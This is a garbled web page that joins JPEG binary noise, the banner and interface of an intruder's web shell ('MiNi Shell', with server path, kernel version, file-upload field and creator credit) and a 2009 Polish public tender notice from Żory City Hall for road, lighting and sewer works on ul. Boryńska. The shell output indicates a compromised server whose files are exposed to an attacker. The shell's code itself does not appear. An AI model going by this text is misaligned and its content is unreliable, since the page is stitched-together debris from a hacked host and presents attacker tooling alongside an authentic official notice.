JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090918/324480-N-2009.html

<p class="kh_header"><b>Żory: Wykonanie II etapu modernizacji ul. Boryńskiej w Żorach</b><br>
<b>Numer ogłoszenia: 324480 - 2009; data zamieszczenia: 18.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 032 4348245, faks 032 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie II etapu modernizacji ul. Boryńskiej w Żorach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie II etapu modernizacji ul. Boryńskiej w Żorach
Opis przedmiotu zamówienia:
Zakres robót drogowych:
1)	Wykonanie jezdni i parkingu z kostki betonowej  na podsypce cementowo-piaskowej gr. 3 cm i podbudowie:
-	warstwa odsączająca z piasku gr. 10 cm
-	warstwa dolna podbudowy z kruszywa łamanego gr. 12 cm
-	warstwa górna podbudowy z kruszywa łamanego gr. 10 cm
2)	Wykonanie ciągów pieszych z kostki betonowej na podsypce cementowo-piaskowej gr. 3cm i warstwie podbudowy:
-	warstwa górna podbudowy z kruszywa łamanego gr. 15 cm
3)	Zastosowanie następujących rodzajów kostki betonowej w ilościach wg przedmiaru robót:
-	prostokąt grafit 20 x 10 cm gr. 8 cm
-	prostokąt szary 20 x 10 cm gr. 8 cm
-	VIA CASTELLO PASTELLO gr. 7 cm
-	AKROPOL KOLOR JESIEŃ gr. 8 cm 
-	kostka granitowa wokół słupów oświetleniowych
Łączna powierzchnia kostki betonowej 1410 m2 
4)	Wykonanie małej architektury:
-	ławki na stelażu metalowym z siedziskiem z drewna dębowego lub egzotycznego, długość 120 cm      - 6 szt.
-	kosze na śmieci na stelażu metalowym z listwami z drewna dębowego lub egzotycznego        - 6 szt.
5)	Wykonanie docelowej organizacji ruchu oraz na czas prowadzenia robót

Zakres robót elektrycznych:
1)	ułożenie linii kablowej YAKY 4 x 35mm2   	354 mb
2)	ułożenie linii kablowej YKY 5 x 2,5mm2  	49 mb 
3)	montaż słupów aluminiowych SAL  DECO-1	10 szt.
4)	przeniesienie istniejących słupów jw.	2 szt.
5)	zabudowa w nawierzchni opraw THORN Mica A  	16 szt.
6)	zabezpieczenie lub przełożenie istniejących kabli na odcinku 	350 m

Zakres robót kanalizacyjnych:
1)	Budowa kanalizacji sanitarnej na odcinku ok. 105,0 m pomiędzy studniami S5-S10 z zastosowaniem materiałów jn.:
o	z rury PVC DN  200mm, klasa S z wydłużonym kielichem	-	105,0 m
o	studnie kanalizacyjne żelbetowe DN 1200 mm z elementów prefabrykowanych, dna studni z gotowymi kinetami 		- 	3 kpl
o	włazy żeliwne typ ciężki	-	     3 szt.
2)	Przebudowa (demontaż i montaż) sieci kanalizacji deszczowej na odcinku o długości   ok. 108,5 m pomiędzy studniami D23 i D27, z zastosowaniem materiałów jn.:
o	z rury PVC DN  400mm, klasa S z wydłużonym kielichem	-	108,5 m
o	studnie kanalizacyjne żelbetowe DN 1200 mm z elementów prefabrykowanych, dna studni z gotowymi kinetami 	- 	4 kpl
o	włazy żeliwne typ ciężki 	-	 4 szt.
3)	Montaż wpustów ściekowych z osadnikiem - 5 kpl,
4)	Podłączenie wpustów do studni przykanalikami z rur PCV fi 200

Wymagania ogólne
§	Obramowanie jezdni wykonać z krawężnika betonowego wibroprasowanego, jednowarstwowego 15 x 30 cm ułożonego na ławie betonowej z oporem 		
§	Regulacja wysokościowa istniejących studni teletechnicznych oraz zaworów wodociągowych i gazowych
§	Inwentaryzacja geodezyjna powykonawcza z naniesieniem na zasoby geodezyjne przez uprawnionego geodetę w 3 egz. - przedłożyć na dzień odbioru
o	Drogowa dokumentacja powykonawcza powinna uwzględniać przekroje drogi i parkingu w miejscach charakterystycznych, rzędne, spadki podłużne  i poprzeczne oraz pozostałe elementy umożliwiające sprawdzenie wykonania zadania zgodnie z dokumentacją i warunkami technicznymi
o	Powierzchnia jezdni, parkingów i ciągów pieszych
o	Inwentaryzacja studni, ciągów kanalizacyjnych, przykanalików i studzienek ściekowych 
§	Masy ziemne i odpady przekazać odbiorcy odpadu posiadającemu zezwolenie  na prowadzenie działalności               w zakresie odzysku odpadów zgodnie z ustawą   o odpadach z dnia 27 kwietnia 2001 r. (Dz.U. nr 62 poz. 628     z 2001 r. z późn. zm.) lub wykorzystać we własnym zakresie zgodnie z posiadanym zezwoleniem na odzysk odpadów. Przekazanie odpadów należy udokumentować pisemnie.
§	Wykonanie zasilania w energię elektryczną oraz wodę dla potrzeb placu budowy wg potrzeb oraz demontaż zasilania
§	Wykonanie inspekcji telewizyjnej kanalizacji sanitarnej i deszczowej po zakończeniu robót.
§	Wszystkie elementy i materiały z rozbiórki - znaki drogowe, kostka, krawężniki itp. przekazać do ZTK -                ul. Okrężna 5 za pokwitowaniem - z rozładunkiem i ułożeniem  w stosy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.22.33.00-9, 45.23.14.00-9, 45.23.21.30-2, 45.23.11.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 5.000 zł  (słownie: pięć tysięcy złotych 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy pzp: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi                          do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 ust. 1 i 2 ustawy pzp.
Szczegółowe warunki Zamawiających:
1) Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowane osoby w celu obsadzenia stanowisk niezbędnych do kierowania, nadzorowania i kontrolowania budowy i robót w branżach: drogowej, sieci  i instalacji elektrycznej i sieci sanitarnej.
2) Wykonanie w ostatnich 5 latach (a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie) co najmniej 2 zadań, odpowiadających swoim rodzajem robotom drogowym, stanowiącym przedmiot zamówienia opisany w pkcie 3 SIWZ o wartości nie mniejszej niż 200.000zł brutto (każde).

Opis sposobu dokonywania oceny spełniania warunków:
Oferty sprawdzane będą pod względem formalnym - zgodnie z wymaganiami podanymi w Specyfikacji Istotnych Warunków Zamówienia oraz na druku oferty. 
Ocena spełnienia ww.  warunków nastąpi w oparciu o oświadczenia i dokumenty złożone przez Wykonawców, na zasadzie spełnia/nie spełnia.
Przeprowadzający postępowanie przyzna zamówienie wykonawcy, którego oferta odpowiada zasadom określonym                  w ustawie z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych  (Dz.U. z 2007roku Nr 223 poz.  1655 - tekst jednolity ze zmianami) i w Specyfikacji istotnych warunków zamówienia oraz została uznana za najkorzystniejszą, tzn. uzyskała największą ilość punktów w oparciu o podane kryterium wyboru oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zgodnie z art. 26 ust. 1 i 2 ustawy pzp, w celu potwierdzenia spełniania warunków określonych w pkcie 5 (siwz) należy złożyć:

1) oświadczenie  o spełnianiu warunków określonych w art. 22 ust 1 ustawy pzp,
2) wykaz osób, którymi dysponuje Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji, a także zakresu wykonywanych przez nich czynności, wraz z kopią uprawnień budowlanych (w branży: drogowej, sieci  i instalacji elektrycznej i sieci sanitarnej)  i aktualnym zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego osób posiadających uprawnienia,
2a) wykaz osób, którymi będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji, a także zakresu wykonywanych przez nich czynności, wraz z kopią uprawnień budowlanych (w branży: drogowej, sieci  i instalacji elektrycznej i sieci sanitarnej) i aktualnym zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego wraz z pisemnym zobowiązaniem innego podmiotu o udostępnieniu osób zdolnych do wykonania zamówienia,
3) wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem                 i wartością robotom drogowym, stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,
4) oświadczenie o udziale podwykonawców w realizacji przedmiotu zamówienia,
5) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wskazujące osoby upoważnione do dokonywania czynności prawnych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
6) oświadczenie o niezaleganiu z uiszczaniem składek na ubezpieczenie zdrowotne i społeczne, opatrzone datą sporządzania oferty, 
7) oświadczenie o niezaleganiu z uiszczaniem podatków i opłat na rzecz Urzędu Skarbowego opatrzone datą sporządzania oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zory.pl   menu przedmiotowe: przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Al. Wojska Polskiego 25, Zespół Zamówień Publicznych, pok. 207 II piętro..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2009 godzina 09:00, miejsce: Urząd Miasta Żory, Al. Wojska Polskiego 25, 44-240 Żory - Informacja - parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com